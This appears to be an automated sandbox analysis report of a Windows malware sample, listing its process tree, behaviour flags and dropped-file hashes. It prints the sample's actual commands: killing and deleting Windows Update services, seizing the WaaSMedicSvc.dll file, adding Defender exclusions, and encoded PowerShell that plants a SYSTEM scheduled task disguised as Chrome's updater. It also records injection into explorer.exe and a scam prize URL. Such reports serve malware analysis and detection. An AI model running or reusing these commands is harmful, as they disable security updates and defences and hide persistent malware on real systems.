C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f6⤵
- Modifies registry key
PID:5988 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f6⤵
- Modifies registry key
PID:6008 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE6⤵PID:6036
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE6⤵PID:6064
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE6⤵PID:6096
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE6⤵PID:6116
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE6⤵PID:6164
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE6⤵PID:6192
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE6⤵PID:6212
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
PID:3672 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
- Suspicious use of AdjustPrivilegeToken
PID:4904 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
PID:5036 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 06⤵
- Suspicious use of AdjustPrivilegeToken
PID:1628 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdwBtAG0AIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEASABFAEEAWQBnAEEAagBBAEQANABBAEkAQQBCAFQAQQBIAFEAQQBZAFEAQgB5AEEASABRAEEATABRAEIAUQBBAEgASQBBAGIAdwBCAGoAQQBHAFUAQQBjAHcAQgB6AEEAQwBBAEEATABRAEIARwBBAEcAawBBAGIAQQBCAGwAQQBGAEEAQQBZAFEAQgAwAEEARwBnAEEASQBBAEEAbgBBAEUATQBBAE8AZwBCAGMAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAEkAQQBCAEcAQQBHAGsAQQBiAEEAQgBsAEEASABNAEEAWABBAEIASABBAEcAOABBAGIAdwBCAG4AQQBHAHcAQQBaAFEAQgBjAEEARQBNAEEAYQBBAEIAeQBBAEcAOABBAGIAUQBCAGwAQQBGAHcAQQBkAFEAQgB3AEEARwBRAEEAWQBRAEIAMABBAEcAVQBBAGMAZwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAdABBAEYAWQBBAFoAUQBCAHkAQQBHAEkAQQBJAEEAQgBTAEEASABVAEEAYgBnAEIAQgBBAEgATQBBAEkAQQBBADgAQQBDAE0AQQBiAFEAQgB6AEEAQwBNAEEAUABnAEEAPQAiACcAKQAgADwAIwBvAGoAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBuAGkAZwBkACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAcAB5ACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAZQB4AHMAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAxADEALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwB4AGoAZABpACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBsAG8AIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="5⤵PID:3516
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://take-realprize.life/?u=lq1pd08&o=hdck0gl3⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdccb846f8,0x7ffdccb84708,0x7ffdccb847184⤵PID:2272
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2660,16708244968791856146,10442016647504070958,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2616 /prefetch:24⤵PID:5432
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2660,16708244968791856146,10442016647504070958,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2864 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:5456 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2660,16708244968791856146,10442016647504070958,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3168 /prefetch:84⤵PID:5728
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2660,16708244968791856146,10442016647504070958,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:14⤵PID:6312
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2660,16708244968791856146,10442016647504070958,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:14⤵PID:6332
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2660,16708244968791856146,10442016647504070958,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5008 /prefetch:84⤵PID:6484
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2660,16708244968791856146,10442016647504070958,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:14⤵PID:6536
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2660,16708244968791856146,10442016647504070958,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4080 /prefetch:84⤵PID:6748
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2660,16708244968791856146,10442016647504070958,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:14⤵PID:6936
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2660,16708244968791856146,10442016647504070958,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4044 /prefetch:14⤵PID:6952
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2660,16708244968791856146,10442016647504070958,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6128 /prefetch:84⤵PID:7208
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings4⤵
- Drops file in Program Files directory
PID:7240 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff660f45460,0x7ff660f45470,0x7ff660f454805⤵PID:7288
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2660,16708244968791856146,10442016647504070958,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6128 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:7516 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2660,16708244968791856146,10442016647504070958,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6080 /prefetch:84⤵PID:8796
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2660,16708244968791856146,10442016647504070958,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1296 /prefetch:84⤵PID:8884
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2660,16708244968791856146,10442016647504070958,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3004 /prefetch:84⤵PID:9240
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2660,16708244968791856146,10442016647504070958,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1716 /prefetch:84⤵PID:9504
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2660,16708244968791856146,10442016647504070958,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5776 /prefetch:84⤵PID:10024
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2660,16708244968791856146,10442016647504070958,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2196 /prefetch:84⤵PID:10204
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2660,16708244968791856146,10442016647504070958,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6156 /prefetch:84⤵PID:10244
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2660,16708244968791856146,10442016647504070958,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2196 /prefetch:84⤵PID:10360
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHEAYgAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAbQBzACMAPgA="1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5484 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6688 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6732 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6812 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵PID:7860
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:7948 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:8092 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:8136 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:8172 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵PID:7812
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
PID:7932 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:7960 -
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
PID:7996 -
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
PID:8084 -
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
PID:8128 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
PID:8180 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
PID:8228 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies registry key
PID:8244 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
PID:8256 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
PID:8268 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:8280 -
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:8292 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
PID:8308 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
PID:8320 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
PID:8332 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
PID:8344 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵PID:8356
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵PID:8368
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵PID:8384
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵PID:8396
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵PID:8408
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵PID:8420
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵PID:8432
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "bmkeytcye"4⤵PID:7988
-
C:\Windows\explorer.exeC:\Windows\explorer.exe sosudejrcxm1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8dyBC4RhMJQS3ZIS6W4m7i7iEJ7cohkojQOsRFzNMr564⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8120
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5600
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.23\Mu\AdvertisingFilesize
24KB
MD54e9962558e74db5038d8073a5b3431aa
SHA13cd097d9dd4b16a69efbb0fd1efe862867822146
SHA2566f81212bd841eca89aa6f291818b4ad2582d7cdb4e488adea98261494bdcd279
SHA512fcd76bca998afc517c87de0db6ee54e45aa2263fa7b91653ac3adb34c41f3681fbe19d673ae9b24fdf3d53f5af4e4968e603a1eb557207f8860ac51372026b2e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.23\Mu\AnalyticsFilesize
4KB
MD5196d785ebbb4c59a4581a688cf89f25a
SHA15764ba17b0f0eff3b3ee2feaa16254c7558ea231
SHA256785f870959e083ea25f61ed88d3a6e87467a25449c5c34bac6da9e6aeec4ae40
SHA512b53262aa2986cb523b26fda77efa921d394826068a9a66e60d3ca6de58b7f14b5f5451bb8e85809539fbd04ce420e8ee374509023835788b8ab9f95ae5df1ee7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.23\Mu\CompatExceptionsFilesize
660B
MD5900263477e1368869fbf1be99990c878
SHA1e56e199aa4119f3cc4c4d46f96daea89bbf9685a
SHA2567f660d9db521646e9c6510d844b6c6ea26716b620c46f34edaf7ce318a9473e4
SHA5121035b388b4b00c744824d13c5ef48118d88abbb53e9d76896a2d96a2a127a7739c119e781d7d5f0b8d910e10539c0c502c9f937fc2487747c65e7285f4b1e6d2
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.23\Mu\ContentFilesize
6KB
MD594c183b842784d0ae69f8aa57c8ac015
SHA1c5b1ebc2b5c140ccbb21cd377ca18f3c5d0b80cd
SHA256aa5c4d50684aa478d5982e509cbf1f8347fbc9cc75cb847d54915c16c3a33d25
SHA5125808ddb81657acf4712fa845c95aacbab32a414ffda3b9d1218637e2d53bd3e0d6b95c872779ead6eaa13b4d2d563494ad5587337958bd17f1e791fad5d822fb
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.23\Mu\CryptominingFilesize
1KB
MD58c31feb9c3faaa9794aa22ce9f48bfbd
SHA1f5411608a15e803afc97961b310bb21a6a8bd5b6
